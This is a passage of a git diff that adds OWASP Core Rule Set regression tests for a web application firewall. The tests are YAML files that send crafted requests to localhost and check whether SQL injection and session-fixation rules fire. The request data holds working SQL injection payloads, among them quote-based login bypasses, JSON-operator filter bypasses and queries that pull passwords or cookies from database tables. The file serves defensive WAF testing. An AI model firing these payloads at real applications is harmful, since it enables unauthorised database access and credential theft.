b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942540.yaml @@ -0,0 +1,135 @@ +--- +meta: + author: "karelorigin, Walter Hop" + description: Various Authentication bypass tests + enabled: true + name: 942540.yaml +tests: + - test_title: 942540-1 + desc: "Positive test for single quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op';" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_title: 942540-2 + desc: "Positive test for double quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op\";" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_title: 942540-3 + desc: "Positive test for backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=admin%40juice-sh.op`;" + version: HTTP/1.0 + output: + log_contains: id "942540" + - test_title: 942540-4 + desc: "False positive test CSV balanced single quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email='foo';'bar';'def'" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_title: 942540-5 + desc: "False positive test balanced backticks" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=`foo`;`bar`;`def`" + version: HTTP/1.0 + output: + no_log_contains: id "942540" + - test_title: 942540-6 + desc: "False positive test (markdown) mixed and balanced quotes" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Content-Type: "multipart/form-data; boundary=--------397236876" + method: POST + port: 80 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="document"; filename="document.md" + Content-Type: text/markdown + + # Foo + my name is 'foo'; and I work on CRS. + # Bar + my name is "bar"; and I work on CRS. + ----------397236876-- + output: + no_log_contains: id "942540" + - test_title: 942540-7 + desc: "Test for bypass with comment" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "email=root%40example.com%27%2F%2A%20comment%20%2A%2F%3B" + version: HTTP/1.0 + output: + log_contains: id "942540" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml new file mode 100644 index 00000000..f7f95467 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942550.yaml @@ -0,0 +1,673 @@ +--- +meta: + author: "Andrea Menin (theMiddle)" + description: JSON in SQL bypass technique + enabled: true + name: 942550.yaml +tests: + - test_title: 942550-1 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-2 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-3 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-4 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-5 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-6 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-7 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-8 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::json <@ '{"a":1, "b":2}' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajson%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-9 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-10 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}' <@ '{"a":1, "b":2}'::json + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%20%3C%40%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajson" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-11 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-12 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb @> '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%40%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-13 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-14 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb < '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3C%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-15 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-16 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"b":2}'::jsonb > '{"a":1, "b":2}'::jsonb + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22b%22%3A2%7D%27%3A%3Ajsonb%20%3E%20%27%7B%22a%22%3A1%2C%20%22b%22%3A2%7D%27%3A%3Ajsonb" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-17 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-18 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' -> '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20-%3E%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-19 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-20 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":2,"c":[4,5,{"f":7}]}' <- '$.c[2].f' = 7 + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A2%2C%22c%22%3A%5B4%2C5%2C%7B%22f%22%3A7%7D%5D%7D%27%20%3C-%20%27%24.c%5B2%5D.f%27%20%3D%207" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-21 + desc: | + JSON in SQL (ARGS) + decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-22 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR json_extract('{"id": 14, "name": "Aztalan"}', '$.name') = 'Aztalan' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20json_extract%28%27%7B%22id%22%3A%2014%2C%20%22name%22%3A%20%22Aztalan%22%7D%27%2C%20%27%24.name%27%29%20%3D%20%27Aztalan%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-23 + desc: | + JSON in SQL (ARGS) + decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-24 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: blah/"}' and data @> '{"a":"a"}' union select ASCII(s.token) from unnset(string_to_array((select cookie from cookie limit 1 ),NULL)) s(token)--/state + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/blah/%22%7D%27%20and%20data%20%40%3E%20%27%7B%22a%22%3A%22a%22%7D%27%20union%20select%20ASCII%28s.token%29%20from%20unnset%28string_to_array%28%28select%20cookie%20from%20cookie%20limit%201%20%29%2CNULL%29%29%20s%28token%29--/state" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-25 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":"b"}' ? 'a' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-26 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":"b"}' ? 'a' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A%22b%22%7D%27%20%3F%20%27a%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-27 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '[1,2]' ? '1' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-28 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '[1,2]' ? '1' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%5B1%2C2%5D%27%20%3F%20%271%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-29 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"name":"asd"}' ?| array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-30 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"name":"asd"}' ?| array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%7C%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-31 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"name":"asd"}' ?& array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-32 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"name":"asd"}' ?& array['a','name'] + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-33 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '[1,2,3]'::json ->> 2='3' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-34 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '[1,2,3]'::json ->> 2='3' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-35 + desc: | + JSON in SQL (ARGS) + decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" + - test_title: 942550-36 + desc: | + JSON in SQL (REQUEST_FILENAME) + decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c' + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27" + version: HTTP/1.0 + output: + log_contains: id "942550" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml new file mode 100644 index 00000000..36b25154 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml @@ -0,0 +1,41 @@ +--- +meta: + author: "Xhoenix" + description: MySQL Scientific Notation bypass payloads Detection + enabled: true + name: 942560.yaml +tests: + - test_title: 942560-1 + desc: "Positive test for Scientific Notation in MySQL, e.g 1.e(" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2" + version: HTTP/1.0 + output: + log_contains: id "942560" + - test_title: 942560-2 + desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e(" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "foo=1.e(ascii)" + version: HTTP/1.0 + output: + log_contains: id "942560" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml new file mode 100644 index 00000000..0fda2219 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -0,0 +1,49 @@ +--- +meta: + author: csanders-git + description: None + enabled: true + name: 943100.yaml +tests: + - test_title: 943100-1 + desc: Session Fixation Attack (943100) from old modsec regressions + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /foo.php?bar=blah + version: HTTP/1.1 + output: + log_contains: id "943100" + - test_title: 943100-2 + desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /foo.php?test=.cookie;expires= + version: HTTP/1.1 + output: + log_contains: id "943100" diff --git 